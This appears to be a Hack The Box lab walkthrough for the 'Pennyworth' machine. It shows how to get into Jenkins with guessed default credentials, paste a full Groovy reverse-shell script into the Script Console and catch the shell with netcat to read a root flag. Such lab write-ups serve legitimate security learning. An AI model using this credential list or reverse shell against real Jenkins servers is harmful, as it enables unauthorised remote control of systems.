top of page

Pennyworth (VIP only)


Enumeration


As usual let's start with nmap:

nmap -sV -sC IP

Replace IP by the IP of your target machine (Pennyworth)


The IP of the target machines are always changing so make sure you type the correct one. You can find it on your Hack The Box account.

Port 8080 http is open. From our VM, let's open our browser and type the following in the url bar:

10.129.233.213:8080
It is important to add :8080 after the IP address. If you only enter the IP, your browser will reach the default port 80. In this instance, it is port 8080 that is open.

We find this login page:


We do not have any credentials so let's use some common Jenkins credentials and try our luck.

admin:password
admin:admin
root:root
root:password
admin:admin1
admin:password1
root:password1

After several trials, we find that using the username root and the password password let us in!



Foothold


After looking around the website for a while, we find this interesting section of the website:

To get there, click on Manage Jenkins on the left pane, then scroll down all the way to the bottom of the page and click on Script Console.


Google "exploit Jenkins" and we find this link https://github.com/gquere/pwn_jenkins

Scroll down to the reverse shell from Groovy code:


String host="myip";
int port=1234;
String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

We use a reverse shell to obtain an interactive shell session directly on the target. Reverse basically means that it is the target that will initiate a connection request back us (the attacker).

Copy paste the code above to the Script Console section of the website. This should look something like this:




Replace IP by the IP of your VM (basically the IP of the attacker's machine).


Note that the script use port=1234, so when we use netcat later to listen, we need to also listen on port 1234


If you don't know what your IP is, open a new command prompt and type ifconfig tun0

Before running the script, open a new command prompt and type the following netcat command and press enter:

nc -lvnp 1234

-l : Listen mode

-n: numeric-only IP addresses, no dns

-v: verbose

-p: port - we can add p to say that we want to listen on a specific port (here 8000)


We use the netcat (nc) command to start listening on our port 1234, and then we just wait for the target to send us a connection request. From there we form an interactive shell and we can then control the target.

Now go back to the script and click on Run at the bottom right of your screen:


Now return to your netcat, and you should see it received a connection request from the target!



From this new created shell, type id or whoami to find out how much privileges you have. We are root! Great!

id

 whoami

Type ls to list all the files in the current directory:

ls

We find an interesting folder called root. Type cd root to go into the root directory.

cd root

Type ls again to list all the files in the root directory:

ls

Let's open the file flag.txt using the cat command

cat flag.txt

Congratulations! You got the flag!

5,922 views0 comments

Recent Posts

See All

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page